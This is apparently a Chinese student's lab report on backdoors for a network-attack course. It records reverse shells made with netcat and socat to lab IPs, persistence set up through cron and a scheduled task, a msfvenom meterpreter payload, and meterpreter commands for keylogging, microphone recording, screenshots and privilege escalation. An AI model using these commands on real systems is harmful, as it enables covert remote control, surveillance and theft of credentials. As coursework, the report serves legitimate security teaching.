20145203盖泽双《网络对抗技术》后门原理与实践

20145203盖泽双《网络对抗技术》后门原理与实践

1.基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

①连接带有后门病毒的网页。

②下载带有后门病毒的文件。

③主动连接不知名的私人网络。

④使用带有后门病毒的U盘或者硬盘。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

①cron启动方式。

②任务启动计划。

③windows或者linux反弹连接向它们注入后门的系统。

(3)Meterpreter有哪些给你映像深刻的功能？

①可以抓取被控主机的击键记录，以便获取被控主机的重要的用户名密码。

②可以控制被控主机的摄像头，窥探隐私很方便，可怕！

③可以获取被控主机的屏幕，随时了解被控用户的动态。

(4)如何发现自己有系统有没有被安装后门？

①如果被杀毒软件检测出有病毒程序，有可能就是后门。

②电脑cpu占用较高，经常死机，有可能被注入了后门程序。

③数据经常莫名丢失，文件打不开或者提示已损坏，很有可能被人植入了后门程序。

2.实验总结与体会

经过这次实验，我感触最深的就是了解到了杀毒软件的重要性。在我的旧电脑上，我一个杀毒软件也没有装，我觉得360经常会造成卡机，电脑管家不好用，其他的还要掏钱买，就觉得没有必要把钱花在这个上面，电脑自身的防火墙应该就足够了，以至于我的旧电脑寿命并不是很长。在这次实验中，我使用的是自己的新电脑，上面有迈克菲杀毒软件，我发现无论我怎么将后门程序放到可信任区，或者取消它的母文件的扫描。这个后门病毒都可以被检测出来，只有把迈克菲的防火墙和实时扫描关掉，后门程序才可以被运行。我的电脑的到了很好的保护，而且被后门软件控制的结果太可怕了，所以我决定迈克菲过期之后续费！
这个实验告诫了我们，在现在的电子信息高速发展的时代，自己的私人信息很容易被窃取，篡改。我们一定要有安全防范意识，尽可能的保护自己不受网络暴力的侵害。

3.实践过程记录

1、使用netcat获取主机操作Shell，cron启动。

   netcat：网络工具中的瑞士军刀，可在两台电脑之间建立链接并返回两个数据流 通过TCP和UDP在网络中读写数据。通过与其他工具结合和重定向来实现我们今天的后门。

（1）windows获取linux shell。
①windows打开监听，以便于在linux反弹连接时可获取其shell。
ncat.exe -l -p 5203

②linux根据windows的ip地址进行反弹连接。
ipconfig
nc 192.168.43.151 5203 -e /bin/sh

③windows获取其shell并对其文件进行修改。

（2）windows对linux设置cron启动

    cron启动作用：windows对linux设置cron启动之后，windows将会在每个固定的时间点获取linux的shell。

①在linux中，使用crontab指令增加一条定时任务。

②在windows终端进行端口监听，等到时间到了之后，进行ls操作。

（3）linux获取windows shell
①linux下查看ip地址。
ifconfig

②linux进行端口监听。

③windows根据linux的ip地址进行反弹连接。

④linux获取windows shell，并对其进行操作

2、使用socat获取主机操作Shell, 任务计划启动。

   socat是netcat(nc)的替代产品，是一个多功能的网络工具，名字来由是Socket CAT，可以看作是netcat的N倍加强版。socat的特点就是在两个流之间建立一個双向的通道。socat的地址类型很多，有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl等。

①在linux中，使用 socat命令进行端口监听。
socat tcp-listen:5203 exec:bash,pty,stderr

②在windows下，对linux进行反弹连接。并打开其20145203文件夹进行ls操作。
socat readline tcp:192.168.19.129:5203

③打开windows控制面板中的管理工具，选择任务计划程序，新建任务。

④在新建任务窗口填写任务名字为20145203，并设置触发器以及操作。设置好后，运行该任务。

⑤因为换了无线网，所以电脑的ip地址有所改变，所以重新ipconfig一下。

⑥在linux下，根据windows的ip地址对其5203端口进行连接。成功获得其windows shell。
socat - tcp:192.168.2.151:5203

3、使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell。

  MSF是Metasploit的简称，Metasploit是一款开源的安全漏洞检测工具，非常强大。

①在linux下，生成反弹式端口型的后门程序。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.129 LPORT=5203 -f exe >5203.exe
注意因为是反弹式端口型，所以这里生成后门程序中的ip地址，是虚拟机的ip地址。

②在linux下，将后门文件发送到windows主机上。
ncat -nv 172.30.4.157 5203 < 5203.exe

③windows下接收该后门程序，并将该后门文件设置为可信任文件，允许其通过防火墙进行通信。
ncat.exe -lv 5203>5203.exe

④在linux下输入msfconsole，进入到msf平台。

⑤修改ip地址为虚拟机的ip地址。修改端口号为5203。并进行查看。
set LHOST 192.168.52.129
set LPORT 5203
show options

⑥在linux下，打开后门程序的监听进程。在windows下运行该后门程序。linux成功获取windows的shell。

4、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权。

①获取目标主机音频。
record_mic

②获取目标主机屏幕。
screenshot

③获取目标主机的击键记录。
keyscan_start
keyscan_dump

④尝试提权。
getsystem